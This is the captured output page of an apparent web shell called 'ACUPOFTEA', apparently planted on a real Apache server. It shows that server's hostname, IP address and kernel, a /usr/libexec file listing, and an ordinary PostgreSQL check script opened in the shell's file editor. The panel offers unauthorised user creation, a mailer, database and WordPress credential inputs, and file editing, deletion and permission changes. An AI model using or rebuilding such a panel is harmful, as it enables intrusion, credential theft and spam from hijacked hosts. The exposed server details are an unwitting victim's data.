System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
libexec
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
postgresql-check-db-dir
#!/bin/bash # This script verifies that the postgresql data directory has been correctly # initialized. We do not want to automatically initdb it, because that has # a risk of catastrophic failure (ie, overwriting a valuable database) in # corner cases, such as a remotely mounted database on a volume that's a # bit slow to mount. But we can at least emit a message advising newbies # what to do. if test -z "$1"; then echo "Maintainer error: $0 must be run with one argument" exit 1 fi service_name="$1" if [ -z "$PGDATA" ]; then echo $"You try to start '$service_name' service" echo $"but the required \$PGDATA environment variable is not set." if test 0 -eq 1; then echo $"You should use the /etc/sysconfig/pgsql/$service_name" else echo $"You should use the /etc/systemd/system/$service_name.service.d/ANYTHING.conf" fi echo $"configuration file to set \$PGDATA. For more info see" echo $"the /usr/share/doc/postgresql/README.rpm-dist file." exit 1 fi # Warn the user that the configuration should be adjusted via drop-in, in case # the $PGDATA variable is set different way (and non-default service name is # used, systemd systems only). conf_dir="/etc/systemd/system/$service_name.service.d" if test 0 = 0 && [[ "$service_name" == *@* ]] && test ! -d "$conf_dir"; then echo >&2 $"WARNING: Note that the '$conf_dir'" echo >&2 $"directory does not exist while you are using non-default service" echo >&2 $"name '$service_name'. You are encouraged to use the" echo >&2 $"$conf_dir directory for systemd configuration according" echo >&2 $"to /usr/share/doc/postgresql/README.rpm-dist documentation." fi # Full PostgreSQL version, e.g. 9.0.2 PGVERSION=10.23 # Major version of PostgreSQL, e.g. 9.0 PGMAJORVERSION=10 # Distribution README file README_DIST=/usr/share/doc/postgresql/README.rpm-dist bad_version() { local real_version="$1" . "/usr/share/postgresql-setup/library.sh" while read id version; do test "$version" = "$real_version" || continue local cmd="postgresql-setup --upgrade" test "postgresql" = "$id" \ || cmd="$cmd --upgrade-from $id" echo $"An old version of the database format was found." echo $"Use '$cmd' to upgrade to version '$PGMAJORVERSION'" echo $"See $README_DIST for more information." return done < <(parse_upgrade_setup list) echo $"An old version '$real_version' of the database format was found." echo $"You need to dump and reload before using PostgreSQL $PGVERSION." echo $"See $README_DIST for more information." return } # Check for the PGDATA structure if [ -f "$PGDATA/PG_VERSION" ] && [ -d "$PGDATA/base" ] then real_version=`cat "$PGDATA/PG_VERSION"` # Check version of existing PGDATA if [ x"$real_version" = x"$PGMAJORVERSION" ] then : A-OK else bad_version "$real_version" exit 1 fi else # No existing PGDATA! Warn the user to initdb it. echo $"Directory \"$PGDATA\" is missing or empty." echo $"Use \"/usr/bin/postgresql-setup --initdb\"" echo $"to initialize the database cluster." echo $"See $README_DIST for more information." exit 1 fi exit 0
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-09-24 10:57:27
..
DIR
-
drwxr-xr-x
2025-06-28 07:14:01
awk
DIR
-
drwxr-xr-x
2024-03-13 04:20:09
coreutils
DIR
-
drwxr-xr-x
2024-03-13 04:20:17
dbus-1
DIR
-
drwxr-xr-x
2025-08-28 10:58:30
dovecot
DIR
-
drwxr-xr-x
2025-04-15 10:57:58
gawk
LINK
-
drwxr-xr-x
2024-03-13 04:20:09
gcc
DIR
-
drwxr-xr-x
2025-08-26 09:44:17
getconf
DIR
-
drwxr-xr-x
2025-08-28 10:58:29
grubby
DIR
-
drwxr-xr-x
2024-06-24 12:46:49
hostname
DIR
-
drwxr-xr-x
2024-03-13 04:21:16
imunify-notifier
DIR
-
drwxr-xr-x
2024-11-18 10:57:19
initscripts
DIR
-
drwxr-xr-x
2024-03-13 04:20:39
installkernel
DIR
-
drwxr-xr-x
2024-06-24 12:46:49
kcare
DIR
-
drwxr-xr-x
2025-10-03 10:57:22
linux-boot-probes
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
man-db
DIR
-
drwxr-xr-x
2024-03-13 04:21:15
mc
DIR
-
drwxr-xr-x
2024-06-24 01:43:03
microcode_ctl
DIR
-
drwxr-xr-x
2025-07-16 10:59:09
nfs-utils
DIR
-
drwxr-xr-x
2025-06-05 10:57:18
openldap
DIR
-
drwxr-xr-x
2025-03-11 09:44:39
openssh
DIR
-
drwxr-xr-x
2025-10-01 10:57:23
os-prober
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
os-probes
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
p11-kit
DIR
-
drwxr-xr-x
2024-06-24 12:44:38
plymouth
DIR
-
drwxr-xr-x
2022-04-18 04:45:15
selinux
DIR
-
drwxr-xr-x
2025-06-03 02:06:53
smartmontools
DIR
-
drwxr-xr-x
2024-06-24 12:46:52
sssd
DIR
-
drwxr-xr-x
2025-06-05 10:57:18
sudo
DIR
-
drwxr-xr-x
2025-08-28 10:58:34
tuned
DIR
-
drwxr-xr-x
2025-03-12 10:58:31
utempter
DIR
-
drwxr-xr-x
2024-03-13 04:20:19
audit-functions
990 B
-rwxr-x---
2025-07-15 09:41:56
chrony-helper
text/x-shellscript
7.17 KB
-rwxr-xr-x
2024-11-05 07:44:41
dirmngr_ldap
application/x-sharedlib
87.32 KB
-rwxr-xr-x
2022-09-13 10:15:05
dnf-utils
text/x-python
3.62 KB
-rwxr-xr-x
2024-04-08 10:02:46
ebtables
text/x-shellscript
1.33 KB
-rwxr-xr-x
2024-04-02 06:37:41
exim.daemon
text/x-shellscript
758 B
-rwxr-xr-x
2025-05-12 05:54:51
generate-rndc-key.sh
text/x-shellscript
546 B
-rwxr-xr-x
2025-02-20 09:05:37
gpg-check-pattern
application/x-sharedlib
111.88 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-preset-passphrase
application/x-sharedlib
87.21 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-protect-tool
application/x-sharedlib
206.3 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-wks-client
application/x-sharedlib
227.22 KB
-rwxr-xr-x
2022-09-13 10:15:05
grepconf.sh
text/x-shellscript
253 B
-rwxr-xr-x
2018-08-12 07:47:56
import-state
text/x-shellscript
1.03 KB
-rwxr-xr-x
2022-08-10 01:03:37
imunify-message-gateway
application/x-executable
5.93 MB
-rwxr-xr-x
2025-08-22 10:14:24
loadmodules
text/x-shellscript
233 B
-rwxr-xr-x
2022-08-10 01:03:37
nfsrahead
application/x-sharedlib
37.12 KB
-rwxr-xr-x
2025-06-04 10:54:29
nm-daemon-helper
application/x-sharedlib
12.6 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-dhcp-helper
application/x-sharedlib
16.2 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-dispatcher
application/x-sharedlib
66.16 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-initrd-generator
application/x-sharedlib
740.48 KB
-rwxr-xr-x
2025-08-26 09:47:31
no-python
text/x-shellscript
157 B
-rwxr-xr-x
2025-08-26 09:08:20
platform-python
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python3.6-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6m
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python3.6m-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6m-x86_64-config
text/x-shellscript
3.54 KB
-rwxr-xr-x
2025-08-26 09:01:50
postgresql-check-db-dir
text/x-shellscript
3.19 KB
-rwxr-xr-x
2024-02-27 08:24:43
report-command-error
application/x-executable
8.06 MB
-rwxr-xr-x
2025-08-22 10:14:24
run-with-intensity
application/x-executable
6.1 MB
-rwxr-xr-x
2025-08-22 10:14:24
scdaemon
application/x-sharedlib
442.36 KB
-rwxr-xr-x
2022-09-13 10:15:05
tcawmgr.cgi
application/x-sharedlib
25.1 KB
-rwxr-xr-x
2019-10-13 01:22:36
virt-what-cpuid-helper
application/x-sharedlib
7.91 KB
-rwxr-xr-x
2023-10-14 08:52:07
~ ACUPOFTEA - mail.ontime-ae.com